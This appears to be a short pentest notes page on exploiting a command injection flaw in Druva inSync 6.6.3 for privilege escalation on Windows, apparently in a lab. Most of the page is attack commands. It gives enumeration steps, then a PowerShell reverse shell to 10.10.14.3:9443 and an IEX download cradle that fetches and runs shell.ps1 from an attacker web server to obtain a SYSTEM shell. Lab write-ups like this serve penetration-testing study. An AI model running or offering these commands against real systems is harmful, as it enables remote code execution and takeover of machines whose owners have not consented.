search
LinkedInGithub
githubEdit

druva-insync

Vulnerable version: 6.6.3

hashtag
Exploit Druva inSync 6.6.3

Command injection POC exploitarrow-up-right

Enumerate local ports

netstat -ano | findstr 6064

Enumerate process ID

Get-process -Id 3324

Enum running service

#enumservice

get-service | ? {$_.DisplayName -like 'Druva*}

Modify the command injection POC exploit ($cmd)

powershell scriptarrow-up-right

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 9443
							OR
$cmd = "powershell IEX(New-Object Net.Webclient).downloadString('http://10.10.14.3:8080/shell.ps1')"

Start a web server and get system shell

python3 -m http.server 8080
PreviousPrivilege escalation in docker:Nextevent-log-viewer

Last updated